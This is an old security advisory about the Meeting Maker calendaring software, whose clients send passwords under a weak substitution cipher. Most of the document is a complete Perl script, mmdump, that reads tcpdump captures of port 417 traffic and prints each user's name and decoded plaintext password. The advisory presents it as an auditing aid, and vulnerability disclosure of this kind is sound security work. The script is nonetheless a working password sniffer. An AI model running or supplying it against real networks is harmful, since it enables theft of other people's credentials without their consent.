COMMAND

    Meeting Maker

SYSTEMS AFFECTED

    Meeting Maker

PROBLEM

    Matt  Power  found  following.   Meeting  Maker  is  a   networked
    calendaring/scheduling  software  package  that's  estimated to be
    installed on over 700,000 desktops (e.g., see their pages).

    Clients send passwords to a  Meeting Maker server encoded using  a
    polyalphabetic substitution cipher.  For an outline of the  risks,
    as  well  as  suggestions  about  how  to reduce vulnerability and
    notes about future Meeting Maker security changes, go to the  Tech
    Note index page at

        http://support.on.com/support/mmxp.nsf/Public/Chronological

    and select the security item dated 04/19/2000.

    Matt was able to  determine the password encoding  by intercepting
    client-to-server traffic.   Meeting Maker site  administrators may
    need  to  check  on  what  passwords  are  being  sent  because of
    requirements for

        - Auditing.  You may have a policy that a user must not choose
          a Meeting  Maker password  that's the  same as  any of their
          other passwords, and need to verify policy adherence.
        - Network  planning.    You  may   need  to  assess    whether
          password-stealing threats  justify the  costs of  making the
          communication channel between your Meeting Maker clients and
          server   encrypted   (or   otherwise   less   vulnerable  to
          eavesdropping).

    Below is a script that can be used in conjunction with tcpdump  to
    monitor one's network  for Meeting Maker  logins.  For  each login
    exchange  that  the  script  detects,  the  script provides the IP
    address of the Meeting Maker  server, the server name (this  won't
    necessarily  match  the  server's  DNS  hostname),  and the client
    user's name  and password.   The script  does not  understand  the
    client-server protocol,  and may  well miss  some (or, potentially
    in  some   environments,  all)   valid  login   exchanges.     The
    network-traffic details  that were  used in  developing the script
    were based on client hosts running Meeting Maker Java Client  6.04
    and a Meeting Maker server running on Windows NT 4.0.

    #!/usr/bin/perl
    #
    # mmdump -- filters tcpdump output to find Meeting Maker passwords
    #
    # Author: Matt Power, mhpower@mit.edu
    # 24 April 2000
    #
    #
    # usage: tcpdump -lnx -s 300 'tcp dst port 417' | mmdump
    #
    # (Note: Meeting Maker is a registered trademark of ON Technology
    # Corporation)
    #
    #
    @x = (20, 8, 9, 19, 9, 19, 1, 19, 20, 21, 16, 9, 4, 23, 1, 19,
          20, 5, 15, 6, 20, 9, 13, 5, 1, 14, 4, 19, 16, 1, 3, 5);
    $in = "";
    $ipl = <>;
    @ipf = split(/ /, $ipl);
    @ic = split(/\./, $ipf[3]);
    $ip = $ic[0] . "." . $ic[1] . "." . $ic[2] . "." . $ic[3];
    while (<>)
    {
        if (/^\s/)
        {
            $in .= $_;
        }
        else
        {
            $ipl = $_;
            @ipf = split(/ /, $ipl);
            @ic = split(/\./, $ipf[3]);
            $newip = $ic[0] . "." . $ic[1] . "." . $ic[2] . "." . $ic[3];
            $in =~ s/\s//g;
            $in =~ s/(..)/$1 /g;
            if ($in =~ /.*7f ff ff .*?00 00 00 .*?00 00 00 (.*)/)
            {
                if ($1 !~ /^[0 ]+$/)
                {
                    ($s = $1) =~ s/ //g;
                    $s1 = hex(substr($s, 0, 2));
                    $s = substr($s, 2, length($s) - 2);
                    $s0 = hex(substr($s, 0, 2));
                    $s3 = 2 * ($s0 + 3);
                    $s = substr($s, 2, length($s) - 2);
                    if ($s1 == $s0 + 1 and length($s) >= $s3)
                    {
                        $f = substr($s, 0, $s0 * 2);
                        $p = sprintf "H%d", 2 * $s0;
                        $fn = pack $p, $f;
                        $out = "Server Address: " . $ip . "\n";
                        $out .= "Server Name: " . $fn . "\n";
                        $s = substr($s, $s3, length($s) - $s3);
                        $s1 = hex(substr($s, 0, 2));
                        $s = substr($s, 2, length($s) - 2);
                        $s0 = hex(substr($s, 0, 2));
                        $s3 = 2 * ($s0 + 3);
                        $s = substr($s, 2, length($s) - 2);
                        if ($s1 == $s0 + 1 and length($s) >= $s3)
                        {
                            $f = substr($s, 0, $s0 * 2);
                            $p = sprintf "H%d", 2 * $s0;
                            $fn = pack $p, $f;
                            $out .= "User Name: " . $fn . "\nPassword: ";
                            $s = substr($s, $s3, length($s) - $s3);
                            $s1 = hex(substr($s, 0, 2));
                            $s = substr($s, 2, length($s) - 2);
                            $s0 = hex(substr($s, 0, 2));
                            $s = substr($s, 2, length($s) - 2);
                            if ($s1 == $s0 + 1 and length($s) == 2 * $s0)
                            {
                                for ($j = 0; $j < 2 * $s0; $j += 2)
                                {
                                    $nr = hex(substr($s, $j, 2));
                                    $i = $j / 2;
                                    if ($nr >= 96)
                                    {
                                        $nr -= 96;
                                        if ($i)
                                        {
                                            $out = "";
                                            last;
                                        }
                                        $out .= chr(($nr ^ $x[$i]) + 32);
                                    }
                                    elsif ($nr >= 64)
                                    {
                                        $nr -= 64;
                                        if (! $i)
                                        {
                                            $out = "";
                                            last;
                                        }
                                        $out .= chr(($nr ^ $x[$i]) + 32);
                                    }
                                    elsif ($nr >= 32)
                                    {
                                        $nr -= 32;
                                        $out .= chr(($nr ^ $x[$i]) +
                                                    ($i ? 64 : 96));
                                    }
                                    else
                                    {
                                        $out .= chr(($nr ^ $x[$i]) +
                                                    ($i ? 96 : 64));
                                    }
                                }
                                if ($out ne "")
                                {
                                    print $out . "\n\n";
                                }
                            }
                        }
                    }
                }
            }
            $in = "";
            $ip = $newip;
        }
    }

SOLUTION

    Nothnig yet.